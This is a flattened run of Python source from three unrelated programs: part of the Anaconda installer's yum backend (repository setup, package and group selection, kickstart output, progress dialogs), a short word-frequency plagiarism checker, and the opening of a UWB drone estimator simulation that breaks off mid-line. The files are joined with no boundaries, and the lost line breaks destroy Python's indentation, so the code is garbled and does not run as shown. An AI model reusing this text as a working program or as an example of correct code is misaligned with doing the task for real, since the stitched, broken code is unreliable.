self.rpmdb.returnNewestByName(pkg) return True except (IndexError, yum.Errors.PackageSackError): pass return False def _groupHasPackages(self, grp): # this checks to see if the given group has any packages available # (ie, already installed or in the sack of available packages) # so that we don't show empty groups. also, if there are mandatory # packages and we have none of them, don't show for pkg in grp.mandatory_packages.keys(): if self._pkgExists(pkg): return True if len(grp.mandatory_packages) > 0: return False for pkg in grp.default_packages.keys() + grp.optional_packages.keys() + \ grp.conditional_packages.keys(): if self._pkgExists(pkg): return True return False class YumBackend(AnacondaBackend): def __init__ (self, anaconda): AnacondaBackend.__init__(self, anaconda) self.supportsPackageSelection = True buf = """ [main] installroot=%s cachedir=/var/cache/yum keepcache=0 logfile=/tmp/yum.log metadata_expire=0 obsoletes=True pluginpath=/usr/lib/yum-plugins,/tmp/updates/yum-plugins pluginconfpath=/etc/yum/pluginconf.d,/tmp/updates/pluginconf.d plugins=1 reposdir=/etc/anaconda.repos.d,/tmp/updates/anaconda.repos.d,/tmp/product/anaconda.repos.d debuglevel=6 """ % (anaconda.rootPath) if anaconda.proxy: buf += "proxy=%s\n" % anaconda.proxy if anaconda.proxyUsername: buf += "proxy_username=%s\n" % anaconda.proxyUsername if anaconda.proxyPassword: buf += "proxy_password=%s\n" % anaconda.proxyPassword fd = open("/tmp/anaconda-yum.conf", "w") fd.write(buf) fd.close() def complete(self, anaconda): if not anaconda.mediaDevice and os.path.ismount(self.ayum.tree): isys.umount(self.ayum.tree) # Attempt to clean up Yum so that running yum in post will work (#1110148) self.ayum.closeRpmDB() del self.ayum.tsInfo del self.ayum.ts self.ayum.close() # clean up rpmdb locks so that kickstart %post scripts aren't # unhappy (#496961) iutil.resetRpmDb(anaconda.rootPath) def doBackendSetup(self, anaconda): if anaconda.dir == DISPATCH_BACK: return DISPATCH_BACK if anaconda.id.getUpgrade(): # FIXME: make sure that the rpmdb doesn't have stale locks :/ iutil.resetRpmDb(anaconda.rootPath) iutil.writeRpmPlatform() self.ayum = AnacondaYum(anaconda) self.ayum.setup() self.ayum.doMacros() # If any enabled repositories require networking, go ahead and bring # it up now. No need to have people wait for the timeout when we # know this in advance. if len(filter(lambda r: r.needsNetwork(), self.ayum.repos.listEnabled())) > 0 and \ not network.hasActiveNetDev(): if not anaconda.intf.enableNetwork(): anaconda.intf.messageWindow(_("No Network Available"), _("Some of your software repositories require " "networking, but there was an error enabling the " "network on your system."), type="custom", custom_icon="error", custom_buttons=[_("_Exit installer")]) sys.exit(1) urlgrabber.grabber.reset_curl_obj() self.doRepoSetup(anaconda) self.doSackSetup(anaconda) self.doGroupSetup(anaconda) self.ayum.doMacros() def doGroupSetup(self, anaconda): while True: try: # FIXME: this is a pretty ugly hack to make it so that we don't lose # groups being selected (#237708) sel = filter(lambda g: g.selected, self.ayum.comps.get_groups()) self.ayum.doGroupSetup() # now we'll actually reselect groups.. map(lambda g: self.selectGroup(g.groupid), sel) # and now, to add to the hacks, we'll make sure that packages don't # have groups double-listed. this avoids problems with deselecting # groups later for txmbr in self.ayum.tsInfo.getMembers(): txmbr.groups = yum.misc.unique(txmbr.groups) except (GroupsError, NoSuchGroup, RepoError), e: buttons = [_("_Exit installer"), _("_Retry")] else: break # success rc = anaconda.intf.messageWindow(_("Error"), _("Unable to read group information " "from repositories. This is " "a problem with the generation " "of your install tree."), type="custom", custom_icon="error", custom_buttons = buttons) if rc == 0: sys.exit(0) else: self.ayum._setGroups(None) continue def doRepoSetup(self, anaconda, thisrepo = None, fatalerrors = True): self.__withFuncDo(anaconda, lambda r: self.ayum.doRepoSetup(thisrepo=r.id), thisrepo=thisrepo, fatalerrors=fatalerrors, callback=RepoSetupPulseProgress(anaconda.intf)) def doSackSetup(self, anaconda, thisrepo = None, fatalerrors = True): self.__withFuncDo(anaconda, lambda r: self.ayum.doSackSetup(thisrepo=r.id), thisrepo=thisrepo, fatalerrors=fatalerrors, callback=SackSetupProgress(anaconda.intf)) def __withFuncDo(self, anaconda, fn, thisrepo=None, fatalerrors=True, callback=None): # Don't do this if we're being called as a dispatcher step (instead # of being called when a repo is added via the UI) and we're going # back. if thisrepo is None and anaconda.dir == DISPATCH_BACK: return # We want to call the function one repo at a time so we have some # concept of which repo didn't set up correctly. if thisrepo is not None: repos = [self.ayum.repos.getRepo(thisrepo)] else: repos = self.ayum.repos.listEnabled() for repo in repos: if callback: callback.connect(repo) while True: try: fn(repo) if callback: callback.disconnect() except RepoError, e: if callback: callback.disconnect() if repo.needsNetwork() and not network.hasActiveNetDev(): if anaconda.intf.enableNetwork(): repo.mirrorlistparsed = False continue urlgrabber.grabber.reset_curl_obj() buttons = [_("_Exit installer"), _("Edit"), _("_Retry")] else: break # success if anaconda.isKickstart: buttons.append(_("_Continue")) if not fatalerrors: raise RepoError, e rc = anaconda.intf.messageWindow(_("Error"), _("Unable to read package metadata. This may be " "due to a missing repodata directory. Please " "ensure that your install tree has been " "correctly generated.\n\n%s" % e), type="custom", custom_icon="error", custom_buttons=buttons) if rc == 0: # abort sys.exit(0) elif rc == 1: # edit anaconda.intf.editRepoWindow(repo) break elif rc == 2: # retry, but only if button is present continue else: # continue, but only if button is present self.ayum.repos.delete(repo.id) break # if we're in kickstart the repo may have been deleted just above try: self.ayum.repos.getRepo(repo.id) except RepoError: log.debug("repo %s has been removed" % (repo.id,)) continue repo.setFailureObj(self.ayum.urlgrabberFailureCB) repo.setMirrorFailureObj((self.ayum.mirrorFailureCB, (), {"repo": repo.id})) self.ayum.repos.callback = None def getDefaultGroups(self, anaconda): langs = anaconda.id.instLanguage.getCurrentLangSearchList() rc = map(lambda x: x.groupid, filter(lambda x: x.default, self.ayum.comps.groups)) for g in self.ayum.comps.groups: if g.langonly in langs: rc.append(g.groupid) return rc def resetPackageSelections(self): """Reset the package selection to an empty state.""" for txmbr in self.ayum.tsInfo: self.ayum.tsInfo.remove(txmbr.pkgtup) self.ayum.tsInfo.conditionals.clear() for grp in self.ayum.comps.groups: grp.selected = False def selectModulePackages(self, anaconda, kernelPkgName): (base, sep, ext) = kernelPkgName.partition("-") moduleProvides = [] for (path, name) in anaconda.id.extraModules: if ext != "": moduleProvides.append("dud-%s-%s" % (name, ext)) else: moduleProvides.append("dud-%s" % name) #We need to install the packages which contain modules from DriverDiscs for modPath in isys.modulesWithPaths(): log.debug("Checking for DUD module "+modPath) match = DD_EXTRACTED.match(modPath) if match: log.info("Requesting install of kmod-%s" % (match.group("modulename"))) moduleProvides.append("kmod-"+match.group("modulename")) else: continue for module in moduleProvides: pkgs = self.ayum.returnPackagesByDep(module) if not pkgs: log.warning("Didn't find any package providing %s" % module) for pkg in pkgs: log.info("selecting package %s for %s" % (pkg.name, module)) self.ayum.install(po=pkg) def selectBestKernel(self, anaconda): """Find the best kernel package which is available and select it.""" def getBestKernelByArch(pkgname, ayum): """Convenience func to find the best arch of a kernel by name""" try: pkgs = ayum.pkgSack.returnNewestByName(pkgname) except yum.Errors.PackageSackError: return None pkgs = self.ayum.bestPackagesFromList(pkgs) if len(pkgs) == 0: return None return pkgs[0] def selectKernel(pkgname): try: pkg = getBestKernelByArch(pkgname, self.ayum) except PackageSackError: log.debug("no %s package" % pkgname) return False if not pkg: return False log.info("selected %s package for kernel" % pkg.name) self.ayum.install(po=pkg) self.selectModulePackages(anaconda, pkg.name) if len(self.ayum.tsInfo.matchNaevr(name="gcc")) > 0: log.debug("selecting %s-devel" % pkg.name) self.selectPackage("%s-devel.%s" % (pkg.name, pkg.arch)) return True if anaconda.isKickstart and "kernel" in anaconda.id.ksdata.packages.excludedList: return foundkernel = False if not foundkernel and isys.isPaeAvailable(): if selectKernel("kernel-PAE"): foundkernel = True if not foundkernel: selectKernel("kernel") def selectFSPackages(self, storage): fspkgs = set() for device in storage.fsset.devices: # this takes care of device and filesystem packages for pkg in device.packages: fspkgs.add(pkg) map(self.selectPackage, fspkgs) def selectAnacondaNeeds(self, anaconda): # Only add in chkconfig if they did something that needs it. if anaconda.isKickstart and (anaconda.id.ksdata.services.disabled or anaconda.id.ksdata.services.enabled) or \ anaconda.id.storage.services or anaconda.id.network.hasActiveIPoIBDevice(): self.selectPackage("chkconfig") def doPostSelection(self, anaconda): # Only solve dependencies on the way through the installer, not the way back. if anaconda.dir == DISPATCH_BACK: return dscb = YumDepSolveProgress(anaconda.intf, self.ayum) self.ayum.dsCallback = dscb # do some sanity checks for kernel and bootloader if not anaconda.id.getUpgrade(): # New installs only - upgrades will already have all this stuff. self.selectBestKernel(anaconda) map(self.selectPackage, anaconda.platform.packages) map(self.deselectPackage, anaconda.platform.excluded_packages) self.selectFSPackages(anaconda.id.storage) if anaconda.id.network.hasActiveIPoIBDevice(): self.selectPackage("rdma") self.selectAnacondaNeeds(anaconda) else: self.ayum.update() while True: try: (code, msgs) = self.ayum.buildTransaction() # If %packages --ignoremissing was given, don't bother # prompting for missing dependencies. if anaconda.isKickstart and anaconda.id.ksdata.packages.handleMissing == KS_MISSING_IGNORE: break if code == 1 and not anaconda.id.upgrade: # resolveDeps returns 0 if empty transaction, 1 if error, # 2 if success depprob = "\n".join(msgs) custom_buttons = [_("_Exit installer"), _("_Continue")] if not anaconda.isKickstart: custom_buttons.insert(1, _("_Back")) rc = anaconda.intf.detailedMessageWindow(_("Warning"), _("Some of the packages you have selected for " "install are missing dependencies or conflict " "with another package. You can exit the " "installation, go back and change your package " "selections, or continue installing these " "packages without their dependencies."), depprob + "\n", type="custom", custom_icon="error", custom_buttons=custom_buttons) dscb.pop() if rc == 0: sys.exit(1) elif rc == 1 and not anaconda.isKickstart: self.ayum._undoDepInstalls() return DISPATCH_BACK break except RepoError, e: # FIXME: would be nice to be able to recover here rc = anaconda.intf.messageWindow(_("Error"), _("Unable to read package metadata. This may be " "due to a missing repodata directory. Please " "ensure that your install tree has been " "correctly generated.\n\n%s" % e), type="custom", custom_icon="error", custom_buttons=[_("_Exit installer"), _("_Retry")]) dscb.pop() if rc == 0: sys.exit(0) else: continue else: break (self.dlpkgs, self.totalSize, self.totalFiles) = self.ayum.getDownloadPkgs() if not anaconda.id.upgrade: largePart = anaconda.id.storage.mountpoints.get("/usr", anaconda.id.storage.rootDevice) if largePart and largePart.size < self.totalSize / 1024: rc = anaconda.intf.messageWindow(_("Error"), _("Your selected packages require %d MB " "of free space for installation, but " "you do not have enough available. " "You can change your selections or " "exit the installer." % (self.totalSize / 1024)), type="custom", custom_icon="error", custom_buttons=[_("_Back"), _("_Exit installer")]) dscb.pop() if rc == 1: sys.exit(1) else: self.ayum._undoDepInstalls() return DISPATCH_BACK dscb.pop() if anaconda.mediaDevice and not anaconda.isKickstart: rc = presentRequiredMediaMessage(anaconda) if rc == 0: rc2 = anaconda.intf.messageWindow(_("Reboot?"), _("The system will be rebooted now."), type="custom", custom_icon="warning", custom_buttons=[_("_Back"), _("_Reboot")]) if rc2 == 1: sys.exit(0) else: return DISPATCH_BACK elif rc == 1: # they asked to go back return DISPATCH_BACK self.ayum.dsCallback = None def doPreInstall(self, anaconda): if anaconda.dir == DISPATCH_BACK: for d in ("/selinux", "/dev", "/proc/bus/usb"): try: isys.umount(anaconda.rootPath + d, removeDir = False) except Exception, e: log.error("unable to unmount %s: %s" %(d, e)) return # shorthand upgrade = anaconda.id.getUpgrade() if upgrade: # An old mtab can cause confusion (esp if loop devices are # in it). Be extra special careful and delete any mtab first, # in case the user has done something funny like make it into # a symlink. if os.access(anaconda.rootPath + "/etc/mtab", os.F_OK): os.remove(anaconda.rootPath + "/etc/mtab") f = open(anaconda.rootPath + "/etc/mtab", "w+") f.close() # we really started writing modprobe.conf out before things were # all completely ready. so now we need to nuke old modprobe.conf's # if you're upgrading from a 2.4 dist so that we can get the # transition right if (os.path.exists(anaconda.rootPath + "/etc/modules.conf") and os.path.exists(anaconda.rootPath + "/etc/modprobe.conf") and not os.path.exists(anaconda.rootPath + "/etc/modprobe.conf.anacbak")): log.info("renaming old modprobe.conf -> modprobe.conf.anacbak") os.rename(anaconda.rootPath + "/etc/modprobe.conf", anaconda.rootPath + "/etc/modprobe.conf.anacbak") dirList = ['/var', '/var/lib', '/var/lib/rpm', '/tmp', '/dev', '/etc', '/etc/sysconfig', '/etc/sysconfig/network-scripts', '/etc/X11', '/root', '/var/tmp', '/etc/rpm', '/var/cache', '/var/cache/yum', '/etc/modprobe.d'] # If there are any protected partitions we want to mount, create their # mount points now. for protected in anaconda.id.storage.protectedDevices: if getattr(protected.format, "mountpoint", None): dirList.append(protected.format.mountpoint) for i in dirList: try: os.mkdir(anaconda.rootPath + i) except os.error, (errno, msg): pass # log.error("Error making directory %s: %s" % (i, msg)) self.initLog(anaconda.id, anaconda.rootPath) # setup /etc/rpm/ for the post-install environment iutil.writeRpmPlatform(anaconda.rootPath) try: # FIXME: making the /var/lib/rpm symlink here is a hack to # workaround db->close() errors from rpm iutil.mkdirChain("/var/lib") for path in ("/var/tmp", "/var/lib/rpm"): if os.path.exists(path) and not os.path.islink(path): shutil.rmtree(path) if not os.path.islink(path): os.symlink("%s/%s" %(anaconda.rootPath, path), "%s" %(path,)) else: log.warning("%s already exists as a symlink to %s" %(path, os.readlink(path),)) except Exception, e: # how this could happen isn't entirely clear; log it in case # it does and causes problems later log.error("error creating symlink, continuing anyway: %s" %(e,)) # SELinux hackery (#121369) if flags.selinux: try: os.mkdir(anaconda.rootPath + "/selinux") except Exception, e: pass try: isys.mount("/selinux", anaconda.rootPath + "/selinux", "selinuxfs") except Exception, e: log.error("error mounting selinuxfs: %s" %(e,)) # For usbfs try: isys.mount("/proc/bus/usb", anaconda.rootPath + "/proc/bus/usb", "usbfs") except Exception, e: log.error("error mounting usbfs: %s" %(e,)) # write out the fstab if not upgrade: anaconda.id.storage.fsset.write(anaconda.rootPath) if os.access("/etc/modprobe.d/anaconda.conf", os.R_OK): shutil.copyfile("/etc/modprobe.d/anaconda.conf", anaconda.rootPath + "/etc/modprobe.d/anaconda.conf") anaconda.id.network.write() anaconda.id.network.copyConfigToPath(instPath=anaconda.rootPath) anaconda.id.storage.write(anaconda.rootPath) if not anaconda.id.isHeadless: anaconda.id.keyboard.write(anaconda.rootPath) # make a /etc/mtab so mkinitrd can handle certain hw (usb) correctly f = open(anaconda.rootPath + "/etc/mtab", "w+") f.write(anaconda.id.storage.mtab) f.close() def checkSupportedUpgrade(self, anaconda): if anaconda.dir == DISPATCH_BACK: return self._checkUpgradeVersion(anaconda) self._checkUpgradeArch(anaconda) def _checkUpgradeVersion(self, anaconda): # Figure out current version for upgrade nag and for determining weird # upgrade cases supportedUpgradeVersion = -1 for pkgtup in self.ayum.rpmdb.whatProvides('redhat-release', None, None): n, a, e, v, r = pkgtup if supportedUpgradeVersion <= 0: val = rpmUtils.miscutils.compareEVR((None, '3', '1'), (e, v,r)) if val > 0: supportedUpgradeVersion = 0 else: supportedUpgradeVersion = 1 break if "Red Hat Enterprise Linux" not in productName: supportedUpgradeVersion = 1 if supportedUpgradeVersion == 0: rc = anaconda.intf.messageWindow(_("Warning"), _("You appear to be upgrading from a system " "which is too old to upgrade to this " "version of %s. Are you sure you wish to " "continue the upgrade " "process?") %(productName,), type = "yesno") if rc == 0: iutil.resetRpmDb(anaconda.rootPath) sys.exit(0) def _checkUpgradeArch(self, anaconda): def compareArch(a, b): if re.match("i.86", a) and re.match("i.86", b): return True else: return a == b # get the arch of the initscripts package try: pkgs = self.ayum.pkgSack.returnNewestByName('initscripts') except yum.Errors.PackageSackError: log.info("no packages named initscripts") return None pkgs = self.ayum.bestPackagesFromList(pkgs) if len(pkgs) == 0: log.info("no best package") return myarch = pkgs[0].arch log.info("initscripts is arch: %s" %(myarch,)) for po in self.ayum.rpmdb.getProvides('initscripts'): log.info("po.arch is arch: %s" %(po.arch,)) if not compareArch(po.arch, myarch): rc = anaconda.intf.messageWindow(_("Warning"), _("The arch of the release of %(productName)s you " "are upgrading to appears to be %(myarch)s which " "does not match your previously installed arch of " "%(arch)s. This is likely to not succeed. Are " "you sure you wish to continue the upgrade " "process?") % {'productName': productName, 'myarch': myarch, 'arch': po.arch}, type="yesno") if rc == 0: iutil.resetRpmDb(anaconda.rootPath) sys.exit(0) else: log.warning("upgrade between possibly incompatible " "arches %s -> %s" %(po.arch, myarch)) break def doInstall(self, anaconda): log.info("Preparing to install packages") if not anaconda.id.upgrade: rpm.addMacro("__dbi_htconfig", "hash nofsync %{__dbi_other} %{__dbi_perms}") if anaconda.isKickstart and anaconda.id.ksdata.packages.excludeDocs: rpm.addMacro("_excludedocs", "1") if anaconda.isKickstart and anaconda.id.ksdata.packages.instLangs is not None: # Use nil if instLangs is empty rpm.addMacro('_install_langs', anaconda.id.ksdata.packages.instLangs or '%{nil}') cb = AnacondaCallback(self.ayum, anaconda, self.instLog, self.modeText) cb.setSizes(len(self.dlpkgs), self.totalSize, self.totalFiles) rc = self.ayum.run(self.instLog, cb, anaconda.intf, anaconda.id) if cb.initWindow is not None: cb.initWindow.pop() self.instLog.write("*** FINISHED INSTALLING PACKAGES ***") self.instLog.close () anaconda.id.instProgress = None if rc == DISPATCH_BACK: return DISPATCH_BACK def doPostInstall(self, anaconda): if anaconda.id.getUpgrade(): w = anaconda.intf.waitWindow(_("Post Upgrade"), _("Performing post-upgrade configuration")) else: w = anaconda.intf.waitWindow(_("Post Installation"), _("Performing post-installation configuration")) packages.rpmSetupGraphicalSystem(anaconda) for repo in self.ayum.repos.listEnabled(): repo.dirCleanup() # expire yum caches on upgrade if (flags.cmdline.has_key("preupgrade") or anaconda.id.getUpgrade()) and os.path.exists("%s/var/cache/yum" %(anaconda.rootPath,)): log.info("Expiring yum caches") try: iutil.execWithRedirect("yum", ["clean", "all"], stdout="/dev/tty5", stderr="/dev/tty5", root = anaconda.rootPath) except: pass # nuke preupgrade if flags.cmdline.has_key("preupgrade") and os.path.exists("%s/var/cache/yum/anaconda-upgrade" %(anaconda.rootPath,)): try: shutil.rmtree("%s/var/cache/yum/anaconda-upgrade" %(anaconda.rootPath,)) except: pass # XXX: write proper lvm config AnacondaBackend.doPostInstall(self, anaconda) w.pop() def kernelVersionList(self, rootPath="/"): # FIXME: using rpm here is a little lame, but otherwise, we'd # be pulling in filelists return packages.rpmKernelVersionList(rootPath) def __getGroupId(self, group): """Get the groupid for the given name (english or translated).""" for g in self.ayum.comps.groups: if group == g.name: return g.groupid for trans in g.translated_name.values(): if group == trans: return g.groupid def isGroupSelected(self, group): try: grp = self.ayum.comps.return_group(group) if grp.selected: return True except yum.Errors.GroupsError, e: pass return False def selectGroup(self, group, *args): if not self.ayum.comps.has_group(group): log.debug("no such group %s" % group) raise NoSuchGroup, group types = ["mandatory"] if args: if args[0][0]: types.append("default") if args[0][1]: types.append("optional") else: types.append("default") try: mbrs = self.ayum.selectGroup(group, group_package_types=types) if len(mbrs) == 0 and self.isGroupSelected(group): return except yum.Errors.GroupsError, e: # try to find out if it's the name or translated name gid = self.__getGroupId(group) if gid is not None: mbrs = self.ayum.selectGroup(gid, group_package_types=types) if len(mbrs) == 0 and self.isGroupSelected(gid): return else: log.debug("no such group %s" %(group,)) raise NoSuchGroup, group def deselectGroup(self, group, *args): try: self.ayum.deselectGroup(group, force=True) except yum.Errors.GroupsError, e: # try to find out if it's the name or translated name gid = self.__getGroupId(group) if gid is not None: self.ayum.deselectGroup(gid, force=True) else: log.debug("no such group %s" %(group,)) def selectPackage(self, pkg, *args): try: mbrs = self.ayum.install(pattern=pkg) return len(mbrs) except yum.Errors.InstallError: log.debug("no package matching %s" %(pkg,)) return 0 def deselectPackage(self, pkg, *args): sp = pkg.rsplit(".", 2) txmbrs = [] if len(sp) == 2: txmbrs = self.ayum.tsInfo.matchNaevr(name=sp[0], arch=sp[1]) if len(txmbrs) == 0: exact, match, unmatch = yum.packages.parsePackages(self.ayum.pkgSack.returnPackages(), [pkg], casematch=1) for p in exact + match: txmbrs.append(p) if len(txmbrs) > 0: for x in txmbrs: self.ayum.tsInfo.remove(x.pkgtup) # we also need to remove from the conditionals # dict so that things don't get pulled back in as a result # of them. yes, this is ugly. conditionals should die. for req, pkgs in self.ayum.tsInfo.conditionals.iteritems(): if x in pkgs: pkgs.remove(x) self.ayum.tsInfo.conditionals[req] = pkgs return len(txmbrs) else: log.debug("no such package %s to remove" %(pkg,)) return 0 def groupListExists(self, grps): """Returns bool of whether all of the given groups exist.""" for gid in grps: g = self.ayum.comps.return_group(gid) if not g: log.debug("no such group %s" % (gid,)) return False return True def groupListDefault(self, grps): """Returns bool of whether all of the given groups are default""" rc = False for gid in grps: g = self.ayum.comps.return_group(gid) if g and not g.default: return False elif g: rc = True return rc def writeKS(self, f): for repo in self.ayum.repos.listEnabled(): if repo.name == "Installation Repo": continue if repo.name == "Red Hat Enterprise Linux": continue # If this is a media install, give the enabled addon a special "addon" # baseurl. anaconda will understand this when it reads in the kickstart # file and know what to do. This does not require changes to pykickstart. if repo.anacondaBaseURLs[0].startswith("file://"): repo.baseurl = "file://anaconda-addon" repo.mirrorlist = [] repo.cost = None line = "repo --name=\"%s\" " % (repo.name or repo.repoid) if repo.baseurl: line += " --baseurl=%s" % repo.anacondaBaseURLs[0] else: line += " --mirrorlist=%s" % repo.mirrorlist if repo.proxy: line += " --proxy=\"%s\"" % repo.proxy_dict['http'] if repo.cost: line += " --cost=%s" % repo.cost if repo.includepkgs: line += " --includepkgs=\"%s\"" % ",".join(repo.includepkgs) if repo.exclude: line += " --excludepkgs=\"%s\"" % ",".join(repo.exclude) if not repo.sslverify: line += " --noverifyssl" line += "\n" f.write(line) def writePackagesKS(self, f, anaconda): if anaconda.isKickstart: f.write(anaconda.id.ksdata.packages.__str__()) return groups = [] installed = [] removed = [] # Faster to grab all the package names up front rather than call # searchNevra in the loop below. allPkgNames = map(lambda pkg: pkg.name, self.ayum.pkgSack.returnPackages()) allPkgNames.sort() # On CD/DVD installs, we have one transaction per CD and will end up # checking allPkgNames against a very short list of packages. So we # have to reset to media #0, which is an all packages transaction. old = self.ayum.tsInfo.curmedia self.ayum.tsInfo.curmedia = 0 self.ayum.tsInfo.makelists() txmbrNames = map (lambda x: x.name, self.ayum.tsInfo.getMembers()) self.ayum.tsInfo.curmedia = old if len(self.ayum.tsInfo.instgroups) == 0 and len(txmbrNames) == 0: return for grp in filter(lambda x: x.selected, self.ayum.comps.groups): groups.append(grp.groupid) defaults = grp.default_packages.keys() + grp.mandatory_packages.keys() optionals = grp.optional_packages.keys() for pkg in filter(lambda x: x in defaults and (not x in txmbrNames and x in allPkgNames), grp.packages): removed.append(pkg) for pkg in filter(lambda x: x in txmbrNames, optionals): installed.append(pkg) if len(groups) == 1 and groups[0].lower() == "core": f.write("\n%packages --nobase\n") else: f.write("\n%packages\n") for grp in groups: f.write("@%s\n" % grp) for pkg in installed: f.write("%s\n" % pkg) for pkg in removed: f.write("-%s\n" % pkg) f.write("%end") def writeConfiguration(self): return def getRequiredMedia(self): return self.ayum.tsInfo.reqmedia.keys() class DownloadHeaderProgress: def __init__(self, intf, ayum=None): window = intf.progressWindow(_("Installation Starting"), _("Starting installation process"), 1.0, 0.01) self.window = window self.ayum = ayum self.current = self.loopstart = 0 self.incr = 1 if self.ayum is not None and self.ayum.tsInfo is not None: self.numpkgs = len(self.ayum.tsInfo.getMembers()) if self.numpkgs != 0: self.incr = (1.0 / self.numpkgs) * (1.0 - self.loopstart) else: self.numpkgs = 0 self.refresh() self.restartLoop = self.downloadHeader = self.transactionPopulation = self.refresh self.procReq = self.procConflict = self.unresolved = self.noop def noop(self, *args, **kwargs): pass def pkgAdded(self, *args): if self.numpkgs: self.set(self.current + self.incr) def pop(self): self.window.pop() def refresh(self, *args): self.window.refresh() def set(self, value): self.current = value self.window.set(self.current) class YumDepSolveProgress: def __init__(self, intf, ayum = None): window = intf.progressWindow(_("Dependency Check"), _("Checking dependencies in packages selected for installation"), 1.0, 0.01) self.window = window self.numpkgs = None self.loopstart = None self.incr = None self.ayum = ayum self.current = 0 self.restartLoop = self.downloadHeader = self.transactionPopulation = self.refresh self.procReq = self.procConflict = self.unresolved = self.noop def tscheck(self, num = None): self.refresh() if num is None and self.ayum is not None and self.ayum.tsInfo is not None: num = len(self.ayum.tsInfo.getMembers()) if num: self.numpkgs = num self.loopstart = self.current self.incr = (1.0 / num) * ((1.0 - self.loopstart) / 2) def pkgAdded(self, *args): if self.numpkgs: self.set(self.current + self.incr) def noop(self, *args, **kwargs): pass def refresh(self, *args): self.window.refresh() def set(self, value): self.current = value self.window.set(self.current) def start(self): self.set(0.0) self.refresh() def end(self): self.window.set(1.0) self.window.refresh() def pop(self): self.window.pop() # We don't have reasonable hook for sackSetup, and it # is fairly fast, so we use just waitWindow here class SackSetupProgress: def __init__(self, intf): self.intf = intf def connect(self, repo): if repo.name is None: txt = _("Retrieving installation information.") else: txt = _("Retrieving installation information for %s.")%(repo.name) self.window = self.intf.waitWindow(_("Installation Progress"), txt) def disconnect(self): self.window.pop() class RepoSetupPulseProgress: def __init__(self, intf): self.intf = intf self.repo = None def connect(self, repo): self.repo = repo if repo.name is None: txt = _("Retrieving installation information.") else: txt = _("Retrieving installation information for %s.")%(repo.name) self.window = self.intf.progressWindow(_("Installation Progress"), txt, 1.0, pulse=True) repo.setCallback(self) def disconnect(self): self.window.pop() self.repo.setCallback(None) def refresh(self, *args): self.window.refresh() def set(self): self.window.pulse() def start(self, filename, url, basename, size, text): log.debug("Grabbing %s" % url) self.set() self.refresh() def update(self, read): self.set() self.refresh() def end(self, read): self.set() self.window.refresh() import time import re import math # Main Function.. def plag_ana(): unique = [] print("\n------------------------------------------------------------\n ----***---- Welcome to the PLAGIARISM ANALYSER ----***----\n------------------------------------------------------------\n ") text = input("\nEnter your text: \t") user_input = text.lower() query = re.sub("[^\w]"," ",user_input).split() for t in query: if t not in unique: unique.append(t) # Parsing the database of list of words [sample] sample = open("sample.txt", "r") da = sample.read().lower() database = re.sub("[^\w]", " ",da).split() for t in database: if t not in unique: unique.append(t) t_array1 = [] t_array2 = [] mult = 0 for word in unique: t_array1Counter = 0 t_array2Counter = 0 for tt in query: if tt == word: t_array1Counter += 1 t_array1.append(t_array1Counter) for tt in database: if tt == word: t_array2Counter += 1 t_array2.append(t_array2Counter) for i in range (len(t_array1)): mult += t_array1[i] * t_array2[i] Vectordatabase = 0 for i in range (len(t_array2)): Vectordatabase += t_array2[i]**2 Vectordatabase = math.sqrt(Vectordatabase) Vectorquery = 0 for i in range (len(t_array1)): Vectorquery += t_array1[i]**2 Vectorquery = math.sqrt(Vectorquery) result = ((float)(mult / (Vectorquery * Vectordatabase)) * 100) print("\nPlease Wait...") time.sleep(3) if result>=70.0: print("!! WARNING: !!Plagiarized!! [HIGH], analysed percentage: ({}) % ".format(result)) elif result<70.0 and result>=30.0: print("!!Plagiarized!! [MEDIUM], analysed percentage: ({}) % ".format(result)) elif result<30.0 and result>0.0: print("!!Plagiarized!! [LOW], analysed percentage: ({}) % ".format(result)) else: print("!! GOOD TO GO !! analysed percentage: ({}) % ".format(result)) # Driver Code p=0 while 1: if (p==0): plag_ana() p=1 bb=input("\nWant to analyse again?? please press [Y/N] :\t ") if (bb.lower() == 'yes' or bb.lower() =='y'): plag_ana() elif (bb.lower() =='no' or bb.lower() =='n'): print("\n !THANK YOU! ~ TSG405") break else: print("\n!INVALID INPUT! Please try again!") @ CODED BY TSG405, 2020 """Collect data for comparison of MHE and EKF with different number of anchors This script simulates the performance of MHE and EKF on the trajectories in the data/publication_run folder. For each file, the number of anchors is varied between 1-8 for TWR and 2-8 for TDOA. Every number of anchor is tested in 10 runs with the anchors chosen randomly for every run. The position RMSE for both MHE and EKF is recorded in a csv file that can then be used to generate plots with the 'publication_plots.py' script. """ import os import yaml import numpy as np import random import time start_time = time.time() import UWBsim from UWBsim.airframe.drone import Drone from UWBsim.utils.uwb_ranging import RangingType, RangingSource from UWBsim.simulation import UWBSimulation, SimulationParams # Script settings SEE LINE 58 #N_helpers = 4 #Na = 4 #InputNr = 0 #simulation_type = 1 runs_per_traj_file = 5 mode = 'tdoa' data_folder = os.path.join(UWBsim.DATA_DIR) anchor_file = os.path.join(UWBsim.BASE_DIR, 'anchor_positions.yaml') publication_folder = os.path.dirname(os.path.realpath(__file__)) # Set Estimator parameters params = SimulationParams() params.estimators.ekf.enable = True params.estimators.ekf.rate = 100 params.drone.altitude_enable = True if mode == 'twr': n_anchors = [1, 2, 3, 4, 5, 6, 7, 8] params.ranging.rtype = RangingType.TWR params.estimators.ekf.outlierThreshold = 1500 elif mode == 'tdoa': n_anchors = [2, 3, 4, 5, 6, 7, 8] params.ranging.rtype = RangingType.TDOA params.estimators.ekf.outlierThreshold = 25 with open(anchor_file) as f: positions = yaml.safe_load(f) params.ranging.anchor_positions = [] for key, pos in positions.items(): i = int(key) params.ranging.anchor_positions.append([pos['x'], pos['y'], pos['z']]) params.ranging.source = RangingSource.LOG i = 0 publication_folder_hip = os.path.join(publication_folder, str(mode) + str(i)) while os.path.isdir(publication_folder_hip): publication_folder_hip = os.path.join(publication_folder, str(mode) + str(i)) i += 1 output_file = os.path.join(publication_folder_hip, 'runs_data.csv'.format(mode)) drone_log_file_directory = os.path.join(publication_folder_hip, "DronePosLog") """ # Save parameters for later reference settings_file = output_file.split('.')[0] + '_settings.yaml' with open(settings_file, 'w') as f: yaml.dump(params, f) """ # Global variables for error calculation and drone tracking # mhe_error_sum2 = np.array([0.0,0.0,0.0]) ekf_error_sum2 = np.array([0.0, 0.0, 0.0]) error_count = 0 ekf_error_count = 0 drone_full_x_log = np.empty((60000, 7)) ###drone_full_x_log2 = np.empty((0,4)) def data_callback(drone: Drone): """Record the simulation output in the scripts global variables This function is passed to the simulation and is called at every simulation step. It records the true and estimated states of MHE and EKF in the scripts global variables, so that the performance can be calculated at the end of the simulation. """ global error_count, ekf_error_count, ekf_error_sum2, 